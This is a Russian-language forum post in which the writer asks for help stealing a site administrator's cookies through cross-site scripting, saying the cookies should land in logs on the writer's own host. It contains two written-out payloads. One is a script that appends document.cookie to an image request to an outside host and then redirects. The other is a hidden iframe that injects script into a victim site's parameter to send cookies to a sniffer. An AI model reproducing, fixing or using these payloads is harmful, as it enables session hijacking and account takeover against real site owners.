Собсна проблема в том, что не знаю как сделать так чтобы, это все подсунуть админу, и чтобы его куки выскочили не в окне, а сохранились где-то на моем хосте в лог файлах...в этом роде...
З.Ы если есть другие варианты подскажите пожалуйста... а то уже 2-ую неделю мучаюсь
Эм....тут чуток разобрался...запустил снифер....Но снифер только на форум..на сайт никак...везде права на все урезаны...как мне через активную xSS можно сделать...Люди, помогите пожалуйста.
<script>img = new Image(); img.src = "http://na-s.ru/images/image_1.gif?"+document.cookie; // код кражи куки // редирект через 3 сек. var URL = "http://image.ru/image.jpg" // адрес картинки var speed = 3000 function reload() { document.location = URL } setTimeout("reload()", speed); </script>
Но не работает( как ни старался... проверял на своем хосте...
<html>
тут какой нибуть флуд для админа
<iframe width=21 height=11 style="position: absolute; visibility: hidden;" src="http://жертва/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--><script>document.location='http://тутснифер/?'+document.cookie+;</script>"></iframe></html>